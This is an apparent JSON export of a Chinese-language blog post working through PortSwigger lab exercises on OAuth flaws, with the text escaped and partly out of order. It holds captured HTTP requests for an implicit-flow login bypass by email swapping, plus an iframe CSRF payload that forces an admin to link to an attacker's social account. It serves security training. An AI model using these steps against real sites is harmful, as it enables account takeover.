OAuth\u898f\u7bc4\u7684\u5b9a\u7fa9\u76f8\u5c0d\u5bec\u9b06\uff0c\u6bcf\u7a2e\u6388\u6b0a\u985e\u578b\u90fd\u6709\u8a31\u591a\u53ef\u9078\u53c3\u6578\u548c\u914d\u7f6e\u8a2d\u7f6e\uff0c\u9019\u610f\u5473\u8457\u932f\u8aa4\u914d\u7f6e\u7684\u7bc4\u570d\u5f88\u5927\u3002\u56e0\u6b64\u5728Client Applications(\u7db2\u7ad9\u61c9\u7528\u7a0b\u5f0f)\u7684\u90e8\u4efd\uff0c\u5be6\u4f5c\u65b9\u5f0f\u53ef\u80fd\u4e0d\u592a\u5b89\u5168\u3002<\/p>\n\n\n\n
\u5e38\u898b\u7684\u6f0f\u6d1e\u5982\u4e0b<\/p>\n\n\n\n
\u5176\u4ed6\u548cOAuth\u6709\u95dc\u6f0f\u6d1e\u53ef\u53c3\u8003\u4ee5\u4e0b<\/p>\n\n\n\n
<\/p>\n\n\n\n
\u5728\u96b1\u5f0f\u6d41\u7a0b\u4e2d\uff0c\u6b64 \u8209\u4f8b\u5982\u4e0b\uff0c\u76ee\u6a19\u7db2\u7ad9\u7b2c\u4e09\u65b9\u767b\u5165\u8a8d\u8b49\u6d41\u7a0b\u6700\u5f8c\u4e00\u6b65\uff0c\u6703\u9001\u51faemail\u548ctoken\u7b49\u76f8\u95dc\u4fe1\u606f\u7d66\u7db2\u7ad9\uff0c\u4ee5\u53d6\u5f97\u8a72\u4f7f\u7528\u8005session id<\/p>\n\n\n\n \u4f7f\u7528\u8005\u5c31\u53ef\u7528\u8a72session id\u8a2a\u554f\u7db2\u7ad9<\/p>\n\n\n\n \u4f46\u56e0\u70ba\u8a72\u7db2\u7ad9\u6709\u6f0f\u6d1e\uff0c\u6240\u4ee5\u53ea\u8981\u628a\u525b\u525b\u6210\u529f\u767b\u5165\u7684email\u6539\u70ba\u53d7\u5bb3\u8005\uff0c\u5c31\u53ef\u4ee5\u53d6\u5f97\u53d7\u5bb3\u8005\u7684session id<\/p>\n\n\n\n \u53ea\u8981\u4f7f\u7528\u53d7\u5bb3\u8005\u7684session id\u5c31\u7b49\u540c\u4f7f\u7528\u53d7\u5bb3\u8005\u7684\u8eab\u4efd\u8a2a\u554f\u7db2\u7ad9<\/p>\n\n\n\n Lab: Authentication bypass via OAuth implicit flow<\/p>\n\n\n\n <\/p>\n\n\n\n <\/p>\n\n\n\n \u5982\u679c\u6388\u6b0a\u8acb\u6c42\u6c92\u6709\u767c\u9001 \u4ee5\u793e\u4ea4\u5a92\u9ad4\u5e33\u6236\u767b\u5165\u6642\uff0c\u9ede\u64caAttach a social profile\uff0c\u6703\u767c\u9001\u4ee5\u4e0b\u8acb\u6c42\uff0c\u53ef\u4ee5\u6ce8\u610f\u5230\u6c92\u6709state\u5c6c\u6027<\/p>\n\n\n\n \u63a5\u8457\u6703\u5c0doauth-ac681ffa1e697728c0ee0c86029400ac.web-security-academy.net\u904b\u884c\u4ee5\u4e0b\u8acb\u6c42<\/p>\n\n\n\n \u6700\u5f8c\u6703\u5c0dace41f781ec37791c0a60c5500900023.web-security-academy.net\u57f7\u884c\u4ee5\u4e0b\u8acb\u6c42\uff0c\u8981\u6c42\u793e\u4ea4\u5e33\u6236\u7d81\u5b9a\u7576\u524d\u4f7f\u7528\u8005\uff0c\u63a5\u8457\u5c31\u53ef\u4ee5\u6210\u529f\u4f7f\u7528\u7b2c\u4e09\u65b9\u767b\u5165\u8a2a\u554f\u7db2\u7ad9<\/p>\n\n\n\n \u9000\u51fa\u91cd\u65b0\u4f7f\u7528\u793e\u4ea4\u5e33\u6236\u767b\u9304\uff0c\u767c\u73fe\u7db2\u7ad9\u5df2\u7d93\u81ea\u52d5\u4fdd\u5b58\u4e86\u767b\u9678\u72c0\u614b\uff0c\u8868\u793a\u5728OAuth\u904e\u7a0b\u4e2dsession cookie\u88ab\u4fdd\u5b58\u5230\u5f8c\u7aef<\/p>\n\n\n\n \u5148\u9032\u884c\u7b2c\u4e09\u65b9\u767b\u5165\uff0c\u4e00\u958b\u59cb\u6703\u5148\u9001\u51fa\u4ee5\u4e0b\u8acb\u6c42<\/p>\n\n\n\n \u5230\u6700\u5f8c\u6642\u6703\u9001\u51fa \u7576admin user\u8a2a\u554f\u8a72\u9801\u9762\u6642\u5c31\u6703\u4ee5\u4ed6\u7684\u8eab\u4efd\u5c0doauth-linking\u9001\u51fa\u8acb\u6c42\uff0c\u8981\u6c42\u5c07admin user\u7d81\u5b9a\u5728\u653b\u64ca\u8005\u793e\u4ea4\u5e33\u6236\u4e0a<\/p>\n\n\n\n \u63a5\u8457\u5728\u7528\u653b\u64ca\u8005\u7684\u793e\u4ea4\u5e33\u865f\u767b\u5165\uff0c\u5373\u53ef\u5f97\u5230admin user\u7684\u6b0a\u9650<\/p>\n\n\n\n Lab: Forced OAuth profile linking<\/p>\n","protected":false},"excerpt":{"rendered":" OAuth\u898f\u7bc4\u7684\u5b9a\u7fa9\u76f8\u5c0d\u5bec\u9b06\uff0c\u6bcf\u7a2e\u6388\u6b0a\u985e\u578b\u90fd\u6709\u8a31\u591a\u53ef\u9078\u53c3\u6578\u548c\u914d\u7f6e\u8a2d\u7f6e\uff0c\u9019\u610f\u5473\u8457\u932f\u8aa4\u914d\u7f6e\u7684\u7bc4\u570d\u5f88\u5927\u3002\u56e0\u6b64\u5728Client Applications(\u7db2\u7ad9\u61c9\u7528\u7a0b\u5f0f)\u7684\u90e8\u4efd\uff0c\u5be6\u4f5c\u65b9\u5f0f\u53ef\u80fd\u4e0d\u592a\u5b89\u5168\u3002<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[367],"tags":[],"class_list":["post-1465","post","type-post","status-publish","format-standard","hentry","category-logic-vulnerabilities"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1465","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/comments?post=1465"}],"version-history":[{"count":0,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1465\/revisions"}],"wp:attachment":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media?parent=1465"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/categories?post=1465"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/tags?post=1465"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}POST<\/code>\u8acb\u6c42\u6703\u88ab\u653b\u64ca\u8005\u770b\u5230\u3002\u5982\u679c\u5ba2\u6236\u7aef\u61c9\u7528\u7a0b\u5f0f\u672a\u6b63\u78ba\u6aa2\u67e5\u5b58\u53d6\u6b0a\u6756\u662f\u5426\u8207\u8acb\u6c42\u4e2d\u7684\u5176\u4ed6\u8cc7\u6599\u5339\u914d\uff0c\u653b\u64ca\u8005\u53ef\u4ee5\u7c21\u55ae\u5730\u66f4\u6539\u767c\u9001\u5230\u4f3a\u670d\u5668\u7684\u53c3\u6578\u4f86\u5192\u5145\u4efb\u4f55\u4f7f\u7528\u8005<\/p>\n\n\n\n################# request #################\nPOST \/authenticate HTTP\/1.1\nHost: ac1f1f0a1eb76e23c050849800fd001b.web-security-academy.net\nCookie: session=6ntWWPI6PaoznMF4dwX713MIlD3z42hG\n...omit...\n{\"email\":\"wiener@hotdog.com\",\"username\":\"wiener\",\"token\":\"T2uYRfsLeCDRF2Fwkaqp2MgzclrYGlodzxV_7yHOmcg\"}\n\t\n################# reponse #################\nHTTP\/1.1 302 Found\nLocation: \/\nSet-Cookie: session=5GKYYYl2P4LxKOWs2ruorZuR6lxH6K1J; Secure; HttpOnly; SameSite=None\n...omit...<\/code><\/pre>\n\n\n\n################# request #################\nGET \/ HTTP\/1.1\nHost: ac1f1f0a1eb76e23c050849800fd001b.web-security-academy.net\nCookie: session=5GKYYYl2P4LxKOWs2ruorZuR6lxH6K1J\n...omit...\n\n################# reponse #################\nHTTP\/1.1 200 OK\n...omit...<\/code><\/pre>\n\n\n\n################# request #################\nPOST \/authenticate HTTP\/1.1\nHost: ac1f1f0a1eb76e23c050849800fd001b.web-security-academy.net\nCookie: session=6ntWWPI6PaoznMF4dwX713MIlD3z42hG\n...omit...\n{\"email\":\"attack@macious.net<\/mark>\",\"username\":\"wiener\",\"token\":\"T2uYRfsLeCDRF2Fwkaqp2MgzclrYGlodzxV_7yHOmcg\"}\n\t\n################# reponse #################\nHTTP\/1.1 302 Found\nLocation: \/\nSet-Cookie: session=7XSAB3A4X3BbxAXo3sfoxBzB52gfi40F<\/mark>; Secure; HttpOnly; SameSite=None\n...omit...<\/code><\/pre>\n\n\n\n################# request #################\nGET \/ HTTP\/1.1\nHost: ac1f1f0a1eb76e23c050849800fd001b.web-security-academy.net\nCookie: session=7XSAB3A4X3BbxAXo3sfoxBzB52gfi40F<\/mark>\n...omit...\n\n################# reponse #################\nHTTP\/1.1 200 OK\n...omit...<\/code><\/pre>\n\n\n\n
\n\n\n\n\u642d\u914dstate\u69cb\u5efaCSRF\u653b\u64ca<\/h2>\n\n\n\n
state<\/code>\u53c3\u6578\uff0c\u90a3\u9ebc\u5f9e\u653b\u64ca\u8005\u7684\u89d2\u5ea6\u4f86\u770b\uff0c\u9019\u610f\u5473\u8457\u53ef\u4ee5\u6b3a\u9a19\u4f7f\u7528\u8005\u700f\u89bd\u5668\u5b8c\u6210OAuth\u6d41\u7a0b\u4e4b\u524d\u81ea\u884c\u555f\u52d5OAuth\u6d41\u7a0b\uff0c\u9019\u985e\u4f3c\u65bc\u50b3\u7d71\u7684CSRF \u653b\u64ca\u3002\u56e0\u6b64\uff0c\u5982\u679c\u61c9\u7528\u7a0b\u5f0f\u7121\u6cd5\u4f7f\u7528\u8a72state<\/code>\u53c3\u6578\uff0c\u653b\u64ca\u8005\u53ef\u5c07\u53d7\u5bb3\u8005\u7684\u5e33\u6236\u7d81\u5b9a\u5230\u81ea\u5df1\u7684\u793e\u4ea4\u5a92\u9ad4\u5e33\u6236\uff0c\u4ee5\u52ab\u6301\u53d7\u5bb3\u8005\u5e33\u6236\uff0c\u8209\u4f8b\u5982\u4e0b\u3002<\/p>\n\n\n\n\u76ee\u6a19\u7db2\u7ad9\u7b2c\u4e09\u65b9\u767b\u5165\u6d41\u7a0b<\/h3>\n\n\n\n
1.Authorization request<\/h4>\n\n\n\n
################# request to oauth ################# \nGET \/auth?client_id=ixhm4jhjus0j70exb8g3i&redirect_uri=https:\/\/ace41f781ec37791c0a60c5500900023.web-security-academy.net\/oauth-linking&response_type=code&scope=openid%20profile%20email HTTP\/1.1\n\nhost: oauth-ac681ffa1e697728c0ee0c86029400ac.web-security-academy.net\n...omit...\n\n################# response ################# \n...omit...Redirecting to <a href=\"https:\/\/ace41f781ec37791c0a60c5500900023.web-security-academy.net\/oauth-linking?code=pqJ1ggLiITrJKXOdLW-AMDz_mXvMHey4yyP03Iq2xY4<\/mark>\">...omit...<\/code><\/pre>\n\n\n\n2.User login and consent<\/h4>\n\n\n\n
GET \/interaction\/yvMjwyDFe2dIVeTYRZWDC\nPOST \/interaction\/yvMjwyDFe2dIVeTYRZWDC\/login\nGET \/auth\/yvMjwyDFe2dIVeTYRZWDC\nGET \/interaction\/yvMjwyDFe2dIVeTYRZWDC\nPOST \/interaction\/yvMjwyDFe2dIVeTYRZWDC\/confirm\nGET \/auth\/yvMjwyDFe2dIVeTYRZWDC<\/code><\/pre>\n\n\n\n3. Authorization code grant<\/h4>\n\n\n\n
################# request ################# \nGET \/oauth-linking?code=pqJ1ggLiITrJKXOdLW-AMDz_mXvMHey4yyP03Iq2xY4<\/mark>\nhost: ace41f781ec37791c0a60c5500900023.web-security-academy.net\nCookie: session: 7XSAB3A4X3BbxAXo3sfoxBzB52gfi40F\n...omit...\n\n################# response ################# \n...omit...You have successfully linked your social media account...omit...<\/code><\/pre>\n\n\n\n\u653b\u64ca\u65b9\u6cd5<\/h3>\n\n\n\n
################# request to oauth ################# \nGET \/auth?client_id=ixhm4jhjus0j70exb8g3i&redirect_uri=https:\/\/ace41f781ec37791c0a60c5500900023.web-security-academy.net\/oauth-linking&response_type=code&scope=openid%20profile%20email HTTP\/1.1\n\nhost: oauth-ac681ffa1e697728c0ee0c86029400ac.web-security-academy.net\n...omit...\n\n################# response ################# \n...omit...Redirecting to <a href=\"https:\/\/ace41f781ec37791c0a60c5500900023.web-security-academy.net\/oauth-linking?code=iiN6HvoVPtL59cMoZXLcx6xzDfQpRq4nGaux4Bfzkmn<\/mark>\">...omit...<\/code><\/pre>\n\n\n\nGET \/oauth-linking?code=iiN6HvoVPtL59cMoZXLcx6xzDfQpRq4nGaux4Bfzkmn<\/mark><\/code>\uff0c\u4f46\u5148\u963b\u6b62\u4ed6\u9001\u5230\u7db2\u7ad9\uff0c\u628a\u9019\u500b\u8acb\u6c42\u5305\u88dd\u6210\u4ee5\u4e0b\u9801\u9762\uff0c\u7136\u5f8c\u53e6\u5916\u50b3\u9001\u7d66admin user\uff0c\u8a98\u4f7f\u5c0d\u65b9\u8a2a\u554f<\/p>\n\n\n\n<iframe src=\"https:\/\/ace41f781ec37791c0a60c5500900023.web-security-academy.net\/oauth-linking?code=iiN6HvoVPtL59cMoZXLcx6xzDfQpRq4nGaux4Bfzkmn<\/mark>\"><\/iframe><\/code><\/pre>\n\n\n\nGET \/oauth-linking?code=iiN6HvoVPtL59cMoZXLcx6xzDfQpRq4nGaux4Bfzkmn<\/mark>\nhost: ace41f781ec37791c0a60c5500900023.web-security-academy.net\n...omit...<\/code><\/pre>\n\n\n\n